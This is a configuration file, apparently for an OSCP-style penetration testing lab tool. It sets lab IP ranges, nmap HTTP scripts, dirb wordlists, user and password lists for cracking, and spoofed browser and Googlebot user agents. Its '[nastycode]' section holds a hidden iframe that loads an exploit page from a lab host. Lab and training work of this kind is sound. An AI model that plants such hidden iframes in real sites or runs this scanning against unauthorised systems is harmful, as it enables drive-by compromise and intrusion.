[hosts]
iprange: 192.168.31.200-205
fulliprng: 192.168.31.200-254
opth: /data/lab/results/exam/ipList.gnmap
olst: /data/lab/results/exam/ipList.txt

[base]
rootpth: /data
labpath: /data/lab

[paths]
basepth: /data/lab
rsltpth: /data/lab/results
exampth: /data/lab/results/exam
nmappth: /data/lab/results/exam/nmap 

[nmapscripts]
httpnse: http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-screenshot-html
nsepth: /usr/share/nmap/scripts

[wordlist]
wordlst: /usr/share/dirb/wordlists
shortlst: indexes.txt,small.txt
moderlst: indexes.txt,common.txt,small.txt,mutations_common.txt,extensions_common.txt

[vuln]
vulns: /usr/share/dirb/wordlists/vulns 

[crack]
usrlst: /data/lab/scripts/oscp/users.txt
pwdlst: /data/lab/scripts/oscp/passwords.txt
fzzlst: /data/lab/scripts/oscp/users.txt

[useragent]
uagnt1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko
uagnt2: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
uagnt3: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
uagnt4: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1)
uagnt5: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 
[nastycode]
iframe1: <iframe src="192.168.31.118:8080/exploit" style="visibility:hidden;display:none"></iframe>
